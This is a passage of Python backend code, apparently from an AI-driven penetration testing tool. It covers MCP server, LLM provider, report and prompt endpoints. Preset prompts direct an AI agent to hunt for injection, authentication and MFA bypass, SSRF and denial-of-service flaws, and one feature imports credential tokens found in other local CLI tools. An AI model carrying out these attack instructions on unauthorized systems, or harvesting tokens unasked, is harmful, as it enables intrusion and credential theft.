def _server_to_response(name: str, server: dict) -> MCPServerResponse:
return MCPServerResponse(
name=name,
transport=server.get("transport", "stdio"),
command=server.get("command"),
args=server.get("args"),
url=server.get("url"),
env=server.get("env"),
description=server.get("description", ""),
enabled=server.get("enabled", True),
is_builtin=(name == BUILTIN_SERVER),
)
# --- Endpoints ---
@router.get("/servers", response_model=List[MCPServerResponse])
async def list_servers():
"""List all configured MCP servers."""
config = _read_config()
servers = _get_mcp_servers(config)
return [_server_to_response(name, srv) for name, srv in servers.items()]
@router.get("/servers/{name}", response_model=MCPServerResponse)
async def get_server(name: str):
"""Get a specific MCP server configuration."""
config = _read_config()
servers = _get_mcp_servers(config)
if name not in servers:
raise HTTPException(404, f"MCP server '{name}' not found")
return _server_to_response(name, servers[name])
@router.post("/servers", response_model=MCPServerResponse)
async def create_server(body: MCPServerCreate):
"""Add a new MCP server configuration."""
config = _read_config()
if "mcp_servers" not in config:
config["mcp_servers"] = {}
servers = config["mcp_servers"]
if body.name in servers:
raise HTTPException(409, f"Server '{body.name}' already exists")
# Validate transport-specific fields
if body.transport == "stdio" and not body.command:
raise HTTPException(400, "stdio transport requires 'command' field")
if body.transport == "sse" and not body.url:
raise HTTPException(400, "sse transport requires 'url' field")
server_config = {
"transport": body.transport,
"description": body.description,
"enabled": body.enabled,
}
if body.command:
server_config["command"] = body.command
if body.args:
server_config["args"] = body.args
if body.url:
server_config["url"] = body.url
if body.env:
server_config["env"] = body.env
servers[body.name] = server_config
_write_config(config)
return _server_to_response(body.name, server_config)
@router.put("/servers/{name}", response_model=MCPServerResponse)
async def update_server(name: str, body: MCPServerUpdate):
"""Update an MCP server configuration."""
config = _read_config()
servers = _get_mcp_servers(config)
if name not in servers:
raise HTTPException(404, f"MCP server '{name}' not found")
srv = servers[name]
if body.transport is not None:
srv["transport"] = body.transport
if body.command is not None:
srv["command"] = body.command
if body.args is not None:
srv["args"] = body.args
if body.url is not None:
srv["url"] = body.url
if body.env is not None:
srv["env"] = body.env
if body.description is not None:
srv["description"] = body.description
if body.enabled is not None:
srv["enabled"] = body.enabled
_write_config(config)
return _server_to_response(name, srv)
@router.delete("/servers/{name}")
async def delete_server(name: str):
"""Delete an MCP server configuration."""
if name == BUILTIN_SERVER:
raise HTTPException(403, f"Cannot delete built-in server '{BUILTIN_SERVER}'")
config = _read_config()
servers = _get_mcp_servers(config)
if name not in servers:
raise HTTPException(404, f"MCP server '{name}' not found")
del servers[name]
_write_config(config)
return {"message": f"Server '{name}' deleted"}
@router.post("/servers/{name}/toggle", response_model=MCPServerResponse)
async def toggle_server(name: str):
"""Toggle a server's enabled state."""
config = _read_config()
servers = _get_mcp_servers(config)
if name not in servers:
raise HTTPException(404, f"MCP server '{name}' not found")
srv = servers[name]
srv["enabled"] = not srv.get("enabled", True)
_write_config(config)
return _server_to_response(name, srv)
@router.post("/servers/{name}/test")
async def test_server_connection(name: str):
"""Test connection to an MCP server."""
config = _read_config()
servers = _get_mcp_servers(config)
if name not in servers:
raise HTTPException(404, f"MCP server '{name}' not found")
srv = servers[name]
transport = srv.get("transport", "stdio")
try:
if transport == "sse":
# Test SSE endpoint
import aiohttp
url = srv.get("url", "")
if not url:
return {"success": False, "error": "No URL configured", "tools_count": 0}
async with aiohttp.ClientSession() as session:
async with session.get(url, timeout=aiohttp.ClientTimeout(total=5)) as resp:
if resp.status < 400:
return {"success": True, "message": f"SSE endpoint reachable (HTTP {resp.status})", "tools_count": 0}
return {"success": False, "error": f"HTTP {resp.status}", "tools_count": 0}
elif transport == "stdio":
# Test stdio by checking command exists
import shutil
command = srv.get("command", "")
if not command:
return {"success": False, "error": "No command configured", "tools_count": 0}
if shutil.which(command):
return {"success": True, "message": f"Command '{command}' found in PATH", "tools_count": 0}
else:
return {"success": False, "error": f"Command '{command}' not found in PATH", "tools_count": 0}
except asyncio.TimeoutError:
return {"success": False, "error": "Connection timed out (5s)", "tools_count": 0}
except Exception as e:
return {"success": False, "error": str(e), "tools_count": 0}
@router.get("/servers/{name}/tools", response_model=List[MCPToolResponse])
async def list_server_tools(name: str):
"""List available tools from an MCP server.
For the built-in server, returns tools from the registry.
For external servers, attempts to connect and query.
"""
config = _read_config()
servers = _get_mcp_servers(config)
if name not in servers:
raise HTTPException(404, f"MCP server '{name}' not found")
# For builtin server, return tools from the MCP server module
if name == BUILTIN_SERVER:
try:
from core.mcp_server import TOOLS
return [
MCPToolResponse(
name=t["name"],
description=t.get("description", ""),
server_name=name,
)
for t in TOOLS
]
except ImportError:
return []
# For external servers, try to connect via MCPToolClient
try:
from core.mcp_client import MCPToolClient
# Build minimal config for this single server
client_config = {
"mcp_servers": {
"enabled": True,
"servers": {name: servers[name]}
}
}
client = MCPToolClient(client_config)
connected = await asyncio.wait_for(client.connect(name), timeout=10)
if not connected:
raise HTTPException(502, f"Failed to connect to MCP server '{name}'")
tools_dict = await client.list_tools(name)
tool_list = tools_dict.get(name, [])
await client.disconnect_all()
return [
MCPToolResponse(
name=t.get("name", ""),
description=t.get("description", ""),
server_name=name,
)
for t in tool_list
]
except ImportError:
raise HTTPException(501, "MCP client library not installed")
except asyncio.TimeoutError:
raise HTTPException(504, "Connection to MCP server timed out (10s)")
except HTTPException:
raise
except Exception as e:
raise HTTPException(502, f"Failed to list tools: {str(e)}")
-372
View File
@@ -1,372 +0,0 @@
"""
NeuroSploit v3 - Prompts API Endpoints
"""
from typing import List, Optional
from fastapi import APIRouter, Depends, HTTPException, UploadFile, File
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy import select
from backend.db.database import get_db
from backend.models import Prompt
from backend.schemas.prompt import (
PromptCreate, PromptUpdate, PromptResponse, PromptParse, PromptParseResult, PromptPreset
)
from backend.core.prompt_engine.parser import PromptParser
router = APIRouter()
# Preset prompts
PRESET_PROMPTS = [
{
"id": "full_pentest",
"name": "Full Penetration Test",
"description": "Comprehensive security assessment covering all vulnerability categories",
"category": "pentest",
"content": """Perform a comprehensive penetration test on the target application.
Test for ALL vulnerability categories:
- Injection vulnerabilities (XSS, SQL Injection, Command Injection, LDAP, XPath, Template Injection)
- Authentication flaws (Broken auth, session management, JWT issues, OAuth flaws)
- Authorization issues (IDOR, BOLA, privilege escalation, access control bypass)
- File handling vulnerabilities (LFI, RFI, path traversal, file upload, XXE)
- Request forgery (SSRF, CSRF)
- API security issues (rate limiting, mass assignment, excessive data exposure)
- Client-side vulnerabilities (CORS misconfig, clickjacking, open redirect)
- Information disclosure (error messages, stack traces, sensitive data exposure)
- Infrastructure issues (security headers, SSL/TLS, HTTP methods)
- Business logic flaws (race conditions, workflow bypass)
Use thorough testing with multiple payloads and bypass techniques.
Generate detailed PoC for each vulnerability found.
Provide remediation recommendations."""
},
{
"id": "owasp_top10",
"name": "OWASP Top 10",
"description": "Test for OWASP Top 10 2021 vulnerabilities",
"category": "compliance",
"content": """Test for OWASP Top 10 2021 vulnerabilities:
A01:2021 - Broken Access Control
- IDOR, privilege escalation, access control bypass, CORS misconfig
A02:2021 - Cryptographic Failures
- Sensitive data exposure, weak encryption, cleartext transmission
A03:2021 - Injection
- SQL injection, XSS, command injection, LDAP injection
A04:2021 - Insecure Design
- Business logic flaws, missing security controls
A05:2021 - Security Misconfiguration
- Default configs, unnecessary features, missing headers
A06:2021 - Vulnerable Components
- Outdated libraries, known CVEs
A07:2021 - Identification and Authentication Failures
- Weak passwords, session fixation, credential stuffing
A08:2021 - Software and Data Integrity Failures
- Insecure deserialization, CI/CD vulnerabilities
A09:2021 - Security Logging and Monitoring Failures
- Missing audit logs, insufficient monitoring
A10:2021 - Server-Side Request Forgery (SSRF)
- Internal network access, cloud metadata exposure"""
},
{
"id": "api_security",
"name": "API Security Testing",
"description": "Focused testing for REST and GraphQL APIs",
"category": "api",
"content": """Perform API security testing:
Authentication & Authorization:
- Test JWT implementation (algorithm confusion, signature bypass, claim manipulation)
- OAuth/OIDC flow testing
- API key exposure and validation
- Rate limiting bypass
- BOLA/IDOR on all endpoints
Input Validation:
- SQL injection on API parameters
- NoSQL injection
- Command injection
- Parameter pollution
- Mass assignment vulnerabilities
Data Exposure:
- Excessive data exposure in responses
- Sensitive data in error messages
- Information disclosure in headers
- Debug endpoints exposure
GraphQL Specific (if applicable):
- Introspection enabled
- Query depth attacks
- Batching attacks
- Field suggestion exploitation
API Abuse:
- Rate limiting effectiveness
- Resource exhaustion
- Denial of service vectors"""
},
{
"id": "bug_bounty",
"name": "Bug Bounty Hunter",
"description": "Focus on high-impact, bounty-worthy vulnerabilities",
"category": "bug_bounty",
"content": """Hunt for high-impact vulnerabilities suitable for bug bounty:
Priority 1 - Critical Impact:
- Remote Code Execution (RCE)
- SQL Injection leading to data breach
- Authentication bypass
- SSRF to internal services/cloud metadata
- Privilege escalation to admin
Priority 2 - High Impact:
- Stored XSS
- IDOR on sensitive resources
- Account takeover vectors
- Payment/billing manipulation
- PII exposure
Priority 3 - Medium Impact:
- Reflected XSS
- CSRF on sensitive actions
- Information disclosure
- Rate limiting bypass
- Open redirects (if exploitable)
Look for:
- Unique attack chains
- Business logic flaws
- Edge cases and race conditions
- Bypass techniques for existing security controls
Document with clear PoC and impact assessment."""
},
{
"id": "quick_scan",
"name": "Quick Security Scan",
"description": "Fast scan for common vulnerabilities",
"category": "quick",
"content": """Perform a quick security scan for common vulnerabilities:
- Reflected XSS on input parameters
- Basic SQL injection testing
- Directory traversal/LFI
- Security headers check
- SSL/TLS configuration
- Common misconfigurations
- Information disclosure
Use minimal payloads for speed.
Focus on quick wins and obvious issues."""
},
{
"id": "auth_testing",
"name": "Authentication Testing",
"description": "Focus on authentication and session management",
"category": "auth",
"content": """Test authentication and session management:
Login Functionality:
- Username enumeration
- Password brute force protection
- Account lockout bypass
- Credential stuffing protection
- SQL injection in login
Session Management:
- Session token entropy
- Session fixation
- Session timeout
- Cookie security flags (HttpOnly, Secure, SameSite)
- Session invalidation on logout
Password Reset:
- Token predictability
- Token expiration
- Account enumeration
- Host header injection
Multi-Factor Authentication:
- MFA bypass techniques
- Backup codes weakness
- Rate limiting on OTP
OAuth/SSO:
- State parameter validation
- Redirect URI manipulation
- Token leakage"""
}
]
@router.get("/presets", response_model=List[PromptPreset])
async def get_preset_prompts():
"""Get list of preset prompts"""
return [
PromptPreset(
id=p["id"],
name=p["name"],
description=p["description"],
category=p["category"],
vulnerability_count=len(p["content"].split("\n"))
)
for p in PRESET_PROMPTS
]
@router.get("/presets/{preset_id}")
async def get_preset_prompt(preset_id: str):
"""Get a specific preset prompt by ID"""
for preset in PRESET_PROMPTS:
if preset["id"] == preset_id:
return preset
raise HTTPException(status_code=404, detail="Preset not found")
@router.post("/parse", response_model=PromptParseResult)
async def parse_prompt(prompt_data: PromptParse):
"""Parse a prompt to extract vulnerability types and testing scope"""
parser = PromptParser()
result = await parser.parse(prompt_data.content)
return result
@router.get("", response_model=List[PromptResponse])
async def list_prompts(
category: Optional[str] = None,
db: AsyncSession = Depends(get_db)
):
"""List all custom prompts"""
query = select(Prompt).where(Prompt.is_preset == False)
if category:
query = query.where(Prompt.category == category)
query = query.order_by(Prompt.created_at.desc())
result = await db.execute(query)
prompts = result.scalars().all()
return [PromptResponse(**p.to_dict()) for p in prompts]
@router.post("", response_model=PromptResponse)
async def create_prompt(prompt_data: PromptCreate, db: AsyncSession = Depends(get_db)):
"""Create a custom prompt"""
# Parse vulnerabilities from content
parser = PromptParser()
parsed = await parser.parse(prompt_data.content)
prompt = Prompt(
name=prompt_data.name,
description=prompt_data.description,
content=prompt_data.content,
category=prompt_data.category,
is_preset=False,
parsed_vulnerabilities=[v.dict() for v in parsed.vulnerabilities_to_test]
)
db.add(prompt)
await db.commit()
await db.refresh(prompt)
return PromptResponse(**prompt.to_dict())
@router.get("/{prompt_id}", response_model=PromptResponse)
async def get_prompt(prompt_id: str, db: AsyncSession = Depends(get_db)):
"""Get a prompt by ID"""
result = await db.execute(select(Prompt).where(Prompt.id == prompt_id))
prompt = result.scalar_one_or_none()
if not prompt:
raise HTTPException(status_code=404, detail="Prompt not found")
return PromptResponse(**prompt.to_dict())
@router.put("/{prompt_id}", response_model=PromptResponse)
async def update_prompt(
prompt_id: str,
prompt_data: PromptUpdate,
db: AsyncSession = Depends(get_db)
):
"""Update a prompt"""
result = await db.execute(select(Prompt).where(Prompt.id == prompt_id))
prompt = result.scalar_one_or_none()
if not prompt:
raise HTTPException(status_code=404, detail="Prompt not found")
if prompt.is_preset:
raise HTTPException(status_code=400, detail="Cannot modify preset prompts")
if prompt_data.name is not None:
prompt.name = prompt_data.name
if prompt_data.description is not None:
prompt.description = prompt_data.description
if prompt_data.content is not None:
prompt.content = prompt_data.content
# Re-parse vulnerabilities
parser = PromptParser()
parsed = await parser.parse(prompt_data.content)
prompt.parsed_vulnerabilities = [v.dict() for v in parsed.vulnerabilities_to_test]
if prompt_data.category is not None:
prompt.category = prompt_data.category
await db.commit()
await db.refresh(prompt)
return PromptResponse(**prompt.to_dict())
@router.delete("/{prompt_id}")
async def delete_prompt(prompt_id: str, db: AsyncSession = Depends(get_db)):
"""Delete a prompt"""
result = await db.execute(select(Prompt).where(Prompt.id == prompt_id))
prompt = result.scalar_one_or_none()
if not prompt:
raise HTTPException(status_code=404, detail="Prompt not found")
if prompt.is_preset:
raise HTTPException(status_code=400, detail="Cannot delete preset prompts")
await db.delete(prompt)
await db.commit()
return {"message": "Prompt deleted"}
@router.post("/upload")
async def upload_prompt(file: UploadFile = File(...)):
"""Upload a prompt file (.md or .txt)"""
if not file.filename:
raise HTTPException(status_code=400, detail="No file provided")
ext = "." + file.filename.split(".")[-1].lower() if "." in file.filename else ""
if ext not in {".md", ".txt"}:
raise HTTPException(status_code=400, detail="Invalid file type. Use .md or .txt")
content = await file.read()
try:
text = content.decode("utf-8")
except UnicodeDecodeError:
raise HTTPException(status_code=400, detail="Unable to decode file")
# Parse the prompt
parser = PromptParser()
parsed = await parser.parse(text)
return {
"filename": file.filename,
"content": text,
"parsed": parsed.dict()
}
-408
View File
@@ -1,408 +0,0 @@
"""
NeuroSploit v3 - Providers API
REST endpoints for managing LLM providers and accounts.
"""
from fastapi import APIRouter, HTTPException
from pydantic import BaseModel
from typing import Optional
router = APIRouter()
class ConnectRequest(BaseModel):
label: str = "Manual API Key"
credential: str
credential_type: str = "api_key"
model_override: Optional[str] = None
@router.get("")
async def list_providers():
"""List all providers with their accounts and status."""
from backend.core.smart_router import get_registry
registry = get_registry()
if not registry:
return {"enabled": False, "providers": []}
providers = []
for p in registry.get_all_providers():
accounts = []
for a in p.accounts.values():
accounts.append({
"id": a.id,
"label": a.label,
"source": a.source,
"credential_type": a.credential_type,
"is_active": a.is_active,
"tokens_used": a.tokens_used,
"last_used": a.last_used,
"expires_at": a.expires_at,
"model_override": a.model_override,
})
providers.append({
"id": p.id,
"name": p.name,
"auth_type": p.auth_type,
"api_format": p.api_format,
"tier": p.tier,
"default_model": p.default_model,
"accounts": accounts,
"connected": any(
a.is_active and a.id in registry._credentials
for a in p.accounts.values()
),
"enabled": getattr(p, "enabled", True),
})
return {"enabled": True, "providers": providers}
@router.get("/status")
async def providers_status():
"""Get quota and usage summary."""
from backend.core.smart_router import get_router
router_instance = get_router()
if not router_instance:
return {"enabled": False}
return {"enabled": True, **router_instance.get_status()}
@router.post("/{provider_id}/detect")
async def detect_cli_token(provider_id: str):
"""Auto-detect CLI token for a specific provider."""
from backend.core.smart_router import get_registry, get_extractor
registry = get_registry()
extractor = get_extractor()
if not registry or not extractor:
raise HTTPException(400, "Smart Router not enabled")
token = extractor.detect(provider_id)
if not token:
return {"detected": False, "message": f"No CLI token found for {provider_id}"}
# Add to registry
acct_id = registry.add_account(
provider_id=provider_id,
label=token.label,
credential=token.token,
credential_type=token.credential_type,
source="cli_detect",
refresh_token=token.refresh_token,
expires_at=token.expires_at,
)
return {
"detected": True,
"account_id": acct_id,
"label": token.label,
"credential_type": token.credential_type,
"has_refresh_token": token.refresh_token is not None,
"expires_at": token.expires_at,
}
@router.post("/{provider_id}/connect")
async def connect_provider(provider_id: str, req: ConnectRequest):
"""Manually add an API key or credential."""
from backend.core.smart_router import get_registry
registry = get_registry()
if not registry:
raise HTTPException(400, "Smart Router not enabled")
acct_id = registry.add_account(
provider_id=provider_id,
label=req.label,
credential=req.credential,
credential_type=req.credential_type,
source="manual",
model_override=req.model_override,
)
if not acct_id:
raise HTTPException(404, f"Unknown provider: {provider_id}")
return {"success": True, "account_id": acct_id}
@router.delete("/{provider_id}/accounts/{account_id}")
async def remove_account(provider_id: str, account_id: str):
"""Remove an account from a provider."""
from backend.core.smart_router import get_registry
registry = get_registry()
if not registry:
raise HTTPException(400, "Smart Router not enabled")
success = registry.remove_account(provider_id, account_id)
if not success:
raise HTTPException(404, "Account not found")
return {"success": True}
@router.post("/test/{provider_id}/{account_id}")
async def test_connection(provider_id: str, account_id: str):
"""Test connectivity for a specific account."""
from backend.core.smart_router import get_router
router_instance = get_router()
if not router_instance:
raise HTTPException(400, "Smart Router not enabled")
success, message = await router_instance.test_account(provider_id, account_id)
return {"success": success, "message": message}
# Known models per provider for dropdown selection
PROVIDER_MODELS = {
"claude_code": [
"claude-opus-4-6-20250918",
"claude-sonnet-4-6-20250918",
"claude-sonnet-4-5-20250929",
"claude-haiku-4-5-20251001",
"claude-sonnet-4-20250514",
"claude-opus-4-20250514",
"claude-haiku-4-20250514",
],
"kiro": [
"claude-opus-4-6-20250918",
"claude-sonnet-4-6-20250918",
"claude-sonnet-4-5-20250929",
"claude-haiku-4-5-20251001",
"claude-sonnet-4-20250514",
"claude-opus-4-20250514",
"claude-haiku-4-20250514",
],
"anthropic": [
"claude-opus-4-6-20250918",
"claude-sonnet-4-6-20250918",
"claude-sonnet-4-5-20250929",
"claude-haiku-4-5-20251001",
"claude-sonnet-4-20250514",
"claude-opus-4-20250514",
"claude-haiku-4-20250514",
"claude-3-5-sonnet-20241022",
],
"codex_cli": [
"gpt-4o",
"gpt-4o-mini",
"o3-mini",
"o4-mini",
"gpt-4.1",
"gpt-4.1-mini",
"gpt-4.1-nano",
],
"openai": [
"gpt-4o",
"gpt-4o-mini",
"o3-mini",
"o4-mini",
"gpt-4.1",
"gpt-4.1-mini",
"gpt-4.1-nano",
],
"gemini_cli": [
"gemini-3.0-pro",
"gemini-2.5-pro",
"gemini-2.5-flash",
"gemini-2.0-flash",
"gemini-2.0-flash-lite",
],
"gemini": [
"gemini-3.0-pro",
"gemini-2.5-pro",
"gemini-2.5-flash",
"gemini-2.0-flash",
"gemini-2.0-flash-lite",
],
"cursor": [
"cursor-fast",
"cursor-small",
"gpt-4o",
"claude-sonnet-4-6-20250918",
"claude-sonnet-4-5-20250929",
],
"copilot": [
"gpt-4o",
"gpt-4o-mini",
"claude-sonnet-4-6-20250918",
"claude-sonnet-4-5-20250929",
],
"openrouter": [
"anthropic/claude-opus-4-6",
"anthropic/claude-sonnet-4-6",
"anthropic/claude-sonnet-4-5",
"anthropic/claude-haiku-4-5",
"anthropic/claude-sonnet-4",
"anthropic/claude-opus-4",
"openai/gpt-4o",
"google/gemini-3.0-pro",
"google/gemini-2.5-pro",
"google/gemini-2.5-flash",
"meta-llama/llama-4-maverick",
"deepseek/deepseek-r1",
],
"together": [
"meta-llama/Llama-3-70b-chat-hf",
"meta-llama/Llama-3.3-70B-Instruct-Turbo",
"deepseek-ai/DeepSeek-R1",
"Qwen/Qwen2.5-72B-Instruct-Turbo",
],
"fireworks": [
"accounts/fireworks/models/llama-v3p1-70b-instruct",
"accounts/fireworks/models/llama-v3p3-70b-instruct",
"accounts/fireworks/models/deepseek-r1",
],
"iflow": ["kimi-k2"],
"qwen_code": ["qwen3-coder", "qwen-max"],
"ollama": ["llama3", "llama3.2", "mistral", "codellama", "deepseek-r1"],
"lmstudio": ["local-model"],
}
@router.get("/available-models")
async def available_models():
"""Get list of available provider+model combinations for selection dropdowns."""
from backend.core.smart_router import get_registry
registry = get_registry()
if not registry:
return {"models": []}
models = []
for p in registry.get_all_providers():
active = registry.get_active_accounts(p.id)
if not active:
continue
models.append({
"provider_id": p.id,
"provider_name": p.name,
"default_model": p.default_model,
"tier": p.tier,
"available_models": PROVIDER_MODELS.get(p.id, [p.default_model]),
})
# Sort by tier (paid first) then name
models.sort(key=lambda m: (m["tier"], m["provider_name"]))
return {"models": models}
@router.post("/detect-all")
async def detect_all_tokens():
"""Scan all CLI tools for available tokens."""
from backend.core.smart_router import get_registry, get_extractor
registry = get_registry()
extractor = get_extractor()
if not registry or not extractor:
raise HTTPException(400, "Smart Router not enabled")
tokens = extractor.detect_all()
results = []
for token in tokens:
acct_id = registry.add_account(
provider_id=token.provider_id,
label=token.label,
credential=token.token,
credential_type=token.credential_type,
source="cli_detect",
refresh_token=token.refresh_token,
expires_at=token.expires_at,
)
results.append({
"provider_id": token.provider_id,
"label": token.label,
"account_id": acct_id,
})
return {
"detected_count": len(results),
"results": results,
}
class ToggleRequest(BaseModel):
enabled: bool
@router.post("/{provider_id}/toggle")
async def toggle_provider(provider_id: str, req: ToggleRequest):
"""Enable or disable a provider. Disabled providers are skipped by the router."""
from backend.core.smart_router import get_registry
registry = get_registry()
if not registry:
raise HTTPException(400, "Smart Router not enabled")
success = registry.toggle_provider(provider_id, req.enabled)
if not success:
raise HTTPException(404, f"Unknown provider: {provider_id}")
return {"success": True, "provider_id": provider_id, "enabled": req.enabled}
# Whitelist of env keys that can be modified via UI
ALLOWED_ENV_KEYS = {
"ANTHROPIC_API_KEY", "OPENAI_API_KEY", "GEMINI_API_KEY", "GOOGLE_API_KEY",
"NIM_API_KEY", "NIM_MODEL", "NIM_BASE_URL",
"OPENROUTER_API_KEY", "TOGETHER_API_KEY", "FIREWORKS_API_KEY",
"OLLAMA_HOST", "LMSTUDIO_HOST",
"ENABLE_SMART_ROUTER", "ENABLE_REASONING", "ENABLE_CVE_HUNT",
"ENABLE_MULTI_AGENT", "ENABLE_RESEARCHER_AI",
"NVD_API_KEY", "GITHUB_TOKEN", "TOKEN_BUDGET",
}
class EnvUpdateRequest(BaseModel):
key: str
value: str
@router.get("/env")
async def get_env_keys():
"""Get current values of allowed env keys (masked for secrets)."""
import os
result = {}
for key in sorted(ALLOWED_ENV_KEYS):
val = os.getenv(key, "")
if val and "KEY" in key and key not in ("ENABLE_SMART_ROUTER", "ENABLE_REASONING",
"ENABLE_CVE_HUNT", "ENABLE_MULTI_AGENT",
"ENABLE_RESEARCHER_AI", "TOKEN_BUDGET"):
# Mask API keys: show first 8 and last 4 chars
if len(val) > 16:
result[key] = val[:8] + "..." + val[-4:]
else:
result[key] = "****"
else:
result[key] = val
return {"env": result, "allowed_keys": sorted(ALLOWED_ENV_KEYS)}
@router.post("/env")
async def update_env_key(req: EnvUpdateRequest):
"""Update an env var and persist to .env file."""
import os
from pathlib import Path
if req.key not in ALLOWED_ENV_KEYS:
raise HTTPException(400, f"Key '{req.key}' is not in the allowed whitelist")
# Update in-process env
os.environ[req.key] = req.value
# Persist to .env file
env_path = Path(__file__).parent.parent.parent.parent / ".env"
try:
lines = []
found = False
if env_path.exists():
for line in env_path.read_text().splitlines():
stripped = line.strip()
if stripped.startswith(f"{req.key}=") or stripped.startswith(f"# {req.key}="):
lines.append(f"{req.key}={req.value}")
found = True
else:
lines.append(line)
if not found:
lines.append(f"{req.key}={req.value}")
env_path.write_text("\n".join(lines) + "\n")
except Exception as e:
# Still updated in-process even if file write failed
return {"success": True, "persisted": False, "error": str(e)}
return {"success": True, "persisted": True}
-387
View File
@@ -1,387 +0,0 @@
"""
NeuroSploit v3 - Reports API Endpoints
"""
from typing import List, Optional
from fastapi import APIRouter, Depends, HTTPException
from fastapi.responses import FileResponse, HTMLResponse
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy import select
from pathlib import Path
from backend.db.database import get_db
from backend.models import Scan, Report, Vulnerability, Endpoint
from backend.schemas.report import ReportGenerate, ReportResponse, ReportListResponse
from backend.core.report_engine.generator import ReportGenerator
from backend.config import settings
router = APIRouter()
@router.get("", response_model=ReportListResponse)
async def list_reports(
scan_id: Optional[str] = None,
auto_generated: Optional[bool] = None,
is_partial: Optional[bool] = None,
db: AsyncSession = Depends(get_db)
):
"""List all reports with optional filtering"""
query = select(Report).order_by(Report.generated_at.desc())
if scan_id:
query = query.where(Report.scan_id == scan_id)
if auto_generated is not None:
query = query.where(Report.auto_generated == auto_generated)
if is_partial is not None:
query = query.where(Report.is_partial == is_partial)
result = await db.execute(query)
reports = result.scalars().all()
return ReportListResponse(
reports=[ReportResponse(**r.to_dict()) for r in reports],
total=len(reports)
)
@router.post("", response_model=ReportResponse)
async def generate_report(
report_data: ReportGenerate,
db: AsyncSession = Depends(get_db)
):
"""Generate a new report for a scan"""
# Get scan
scan_result = await db.execute(select(Scan).where(Scan.id == report_data.scan_id))
scan = scan_result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
# Get vulnerabilities
vulns_result = await db.execute(
select(Vulnerability).where(Vulnerability.scan_id == report_data.scan_id)
)
vulnerabilities = vulns_result.scalars().all()
# Try to get tool_executions from agent in-memory results
tool_executions = []
try:
from backend.api.v1.agent import scan_to_agent, agent_results
agent_id = scan_to_agent.get(report_data.scan_id)
if agent_id and agent_id in agent_results:
tool_executions = agent_results[agent_id].get("tool_executions", [])
if not tool_executions:
rpt = agent_results[agent_id].get("report", {})
tool_executions = rpt.get("tool_executions", []) if isinstance(rpt, dict) else []
except Exception:
pass
# Get endpoints
endpoints_result = await db.execute(
select(Endpoint).where(Endpoint.scan_id == report_data.scan_id)
)
endpoints = endpoints_result.scalars().all()
# Generate report
generator = ReportGenerator()
report_path, executive_summary = await generator.generate(
scan=scan,
vulnerabilities=vulnerabilities,
format=report_data.format,
title=report_data.title,
include_executive_summary=report_data.include_executive_summary,
include_poc=report_data.include_poc,
include_remediation=report_data.include_remediation,
tool_executions=tool_executions,
endpoints=endpoints,
)
# Save report record
report = Report(
scan_id=scan.id,
title=report_data.title or f"Report - {scan.name}",
format=report_data.format,
file_path=str(report_path),
executive_summary=executive_summary
)
db.add(report)
await db.commit()
await db.refresh(report)
return ReportResponse(**report.to_dict())
@router.post("/ai-generate", response_model=ReportResponse)
async def generate_ai_report(
report_data: ReportGenerate,
db: AsyncSession = Depends(get_db)
):
"""Generate an AI-enhanced report with LLM-written executive summary and per-finding analysis."""
# Get scan
scan_result = await db.execute(select(Scan).where(Scan.id == report_data.scan_id))
scan = scan_result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
# Get vulnerabilities
vulns_result = await db.execute(
select(Vulnerability).where(Vulnerability.scan_id == report_data.scan_id)
)
vulnerabilities = vulns_result.scalars().all()
# Try to get tool_executions from agent in-memory results
tool_executions = []
try:
from backend.api.v1.agent import scan_to_agent, agent_results
agent_id = scan_to_agent.get(report_data.scan_id)
if agent_id and agent_id in agent_results:
tool_executions = agent_results[agent_id].get("tool_executions", [])
# Also check nested report
if not tool_executions:
rpt = agent_results[agent_id].get("report", {})
tool_executions = rpt.get("tool_executions", []) if isinstance(rpt, dict) else []
except Exception:
pass
# Generate AI report
generator = ReportGenerator()
try:
report_path, ai_summary = await generator.generate_ai_report(
scan=scan,
vulnerabilities=vulnerabilities,
tool_executions=tool_executions,
title=report_data.title,
preferred_provider=report_data.preferred_provider,
preferred_model=report_data.preferred_model,
)
except Exception as e:
import logging
logging.getLogger(__name__).error(f"AI report generation failed: {e}")
raise HTTPException(status_code=500, detail=f"AI report generation failed: {str(e)}")
# Save report record
report = Report(
scan_id=scan.id,
title=report_data.title or f"AI Report - {scan.name}",
format="html",
file_path=str(report_path),
executive_summary=ai_summary[:2000] if ai_summary else None
)
db.add(report)
await db.commit()
await db.refresh(report)
return ReportResponse(**report.to_dict())
@router.get("/{report_id}", response_model=ReportResponse)
async def get_report(report_id: str, db: AsyncSession = Depends(get_db)):
"""Get report details"""
result = await db.execute(select(Report).where(Report.id == report_id))
report = result.scalar_one_or_none()
if not report:
raise HTTPException(status_code=404, detail="Report not found")
return ReportResponse(**report.to_dict())
@router.get("/{report_id}/view")
async def view_report(report_id: str, db: AsyncSession = Depends(get_db)):
"""View report in browser (HTML)"""
result = await db.execute(select(Report).where(Report.id == report_id))
report = result.scalar_one_or_none()
if not report:
raise HTTPException(status_code=404, detail="Report not found")
if not report.file_path:
raise HTTPException(status_code=404, detail="Report file not found")
file_path = Path(report.file_path)
if not file_path.exists():
raise HTTPException(status_code=404, detail="Report file not found on disk")
if report.format == "html":
content = file_path.read_text()
return HTMLResponse(content=content)
else:
return FileResponse(
path=str(file_path),
media_type="application/octet-stream",
filename=file_path.name
)
@router.get("/{report_id}/download/{format}")
async def download_report(
report_id: str,
format: str,
db: AsyncSession = Depends(get_db)
):
"""Download report in specified format"""
result = await db.execute(select(Report).where(Report.id == report_id))
report = result.scalar_one_or_none()
if not report:
raise HTTPException(status_code=404, detail="Report not found")
# Get scan and vulnerabilities for generating report
scan_result = await db.execute(select(Scan).where(Scan.id == report.scan_id))
scan = scan_result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found for report")
vulns_result = await db.execute(
select(Vulnerability).where(Vulnerability.scan_id == report.scan_id)
)
vulnerabilities = vulns_result.scalars().all()
# Always generate fresh report file (handles auto-generated reports without file_path)
generator = ReportGenerator()
report_path, _ = await generator.generate(
scan=scan,
vulnerabilities=vulnerabilities,
format=format,
title=report.title
)
file_path = Path(report_path)
# Update report with file path if not set
if not report.file_path:
report.file_path = str(file_path)
report.format = format
await db.commit()
if not file_path.exists():
raise HTTPException(status_code=404, detail="Report file not found")
media_types = {
"html": "text/html",
"pdf": "application/pdf",
"json": "application/json"
}
return FileResponse(
path=str(file_path),
